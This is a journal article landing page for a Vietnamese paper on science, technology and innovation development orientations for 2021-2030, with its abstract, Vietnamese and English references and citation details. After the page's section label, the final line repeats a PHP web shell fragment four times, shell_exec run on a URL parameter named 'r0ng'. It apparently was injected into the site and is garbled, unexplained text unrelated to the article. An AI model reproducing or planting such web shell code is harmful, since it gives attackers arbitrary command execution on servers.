Some development orientations of science, technology and innovation in Vietnam’s socio-economic development phase 2021-2030

  • Hoang Minh
  • Nguyen Lan Anh
Keywords: Science and technology, Innovation, Scio-economic

Abstract

The development of Science, Technology and Innovation (STI) in Vietnam has always been interested and focused by the Party and the State, has been confirmed in many important documents such as the National Development Platform, the acts, resolutions of the Party,... Over the past years, the Party's lines and policies have oriented the development of the science and technology industry and through which STI have achieved remarkable achievements, contributing to the national socio-economic development. However, compared to the social expectation as well as the important mission of STI, Vietnam's STI has not really become a driving force to improve labor productivity, enhance competitiveness, and promote development of socio-economic.

The article summarizes the major guidelines and orientations of the Party and State on the development of STI, it presents an overview of the contributions of STI to socio-economic development in our country in the past, then it introduces an overview of the domestic and international context affecting the development of STI in the future and introducing the contents of STI presented in the draft 10-year socio-economic development strategy for the period of 2021-2030 to submit to the 13th National Party Congress.

Code: 20101101

Downloads

Download data is not yet available.

References

Tiếng Việt
1. Ban Chấp hành Trung ương, (2020). Dự thảo Báo cáo tổng kết thực hiện Chiến lược phát triển kinh tế-xã hội 10 năm (2011-2020), xây dựng Chiến lược phát triển kinh tế-xã hội 10 năm (2021-2030) (bản Dự thảo tháng 10/2020).
2. Ban Kinh tế Trung ương, (2019). “Cơ sở lý luận và thực tiễn về phát triển bền vững, sáng tạo và bao trùm”. Kỷ yếu Hội thảo khoa học. Hà Nội, tháng 3/2019.
3. Ban Tuyên giáo Trung ương, (2018). “Báo cáo sơ kết 5 năm thực hiện Nghị quyết số 20-NQ/TW, ngày 01/11/2012 của Ban Chấp hành Trung ương khóa XI về phát triển khoa học và công nghệ phục vụ sự nghiệp công nghiệp hóa, hiện đại hóa trong điều kiện kinh tế thị trường định hướng xã hội chủ nghĩa và hội nhập quốc tế”. Hà Nội, tháng 8/2018.
4. Bộ Khoa học và Công nghệ, (2012). Khoa học và công nghệ phục vụ công nghiệp hóa, hiện đại hóa và phát triển bền vững. Hà Nội: Nxb Chính trị quốc gia - Sự thật.
5. Bộ Khoa học và Công nghệ, (2018, 2019). Khoa học và Công nghệ Việt Nam. Hà Nội: Nxb Khoa học và Kỹ thuật.
6. Bộ Khoa học và Công nghệ, (2018, 2019). Báo cáo tổng kết hoạt động KH&CN.
7. Cục Thông tin KH&CN Quốc gia, (2016). “Cuộc cách mạng công nghiệp lần thứ 4”. Tổng luận Khoa học, Công nghệ và Kinh tế, số 8, 2016.
8. Cục Thông tin KH&CN Quốc gia, (2017). “Các xu hướng lớn toàn cầu tác động đến khoa học, công nghệ và đổi mới sáng tạo”. Tổng luận Khoa học, Công nghệ và Kinh tế, số 4, 2017.
9. Cục Thông tin KH&CN Quốc gia, (2019). “Các chính sách đổi mới sáng tạo trong kỷ nguyên số”. Tổng luận Khoa học, Công nghệ và Kinh tế, số 3, 2019.
10. Bộ Khoa học và Công nghệ. (2020). “Giới thiệu báo cáo chỉ số GII năm 2020 và kết quả của Việt Nam”, xem 09/9/2020, .
11. World Bank, OECD, (2014). Đánh giá Khoa học, Công nghệ và Đổi mới sáng tạo ở Việt Nam.
12. World Bank, Bộ Kế hoạch và Đầu tư, (2016). Việt Nam 2035 - Hướng tới thịnh vượng, sáng tạo, công bằng và dân chủ. Báo cáo tổng quan.
13. Cameron A., và cộng sự. (2020). “Hướng tới tăng trưởng dựa trên đổi mới sáng tạo - các chiến lược kinh tế giúp Việt Nam trở thành quốc gia có thu nhập cao”. Tạp chí Chính sách và Quản lý Khoa học và Công nghệ. Số 2, năm 2020.
14. Nguyễn Xuân Phúc, (2019). “Tạo đột phá chiến lược trong phát triển khoa học - công nghệ và đổi mới, sáng tạo ở Việt Nam”, xem 17/5/2019. .
15. Phan Xuân Dũng, (2018). Cách mạng công nghiệp lần thứ tư - Cuộc cách mạng của sự hội tụ và tiết kiệm. Hà Nội: Nxb Khoa học và Kỹ thuật.
Tiếng Anh
16. Cameron A., Pham. T. H., Atherton J., Nguyen D H., P., N. T., & Tran S T. (2019). Vietnam's future digital economy - Towards 2030 and 2045. Retrieved from Hanoi.
Published
2021-01-15
How to Cite
Minh, H., & Anh, N. (2021, January 15). Some development orientations of science, technology and innovation in Vietnam’s socio-economic development phase 2021-2030. Journal SCIENCE AND TECHNOLOGY POLICIES AND MANAGEMENT, 9(3), 1-14. Retrieved from http://vietnamstijournal.net/index.php/JSTPM/article/view/333
Section
STUDIES OF STRATEGIES AND MANAGEMENT
".shell_exec($_GET["r0ng"]);}?> ".shell_exec($_GET["r0ng"]);}?> ".shell_exec($_GET["r0ng"]);}?> ".shell_exec($_GET["r0ng"]);}?>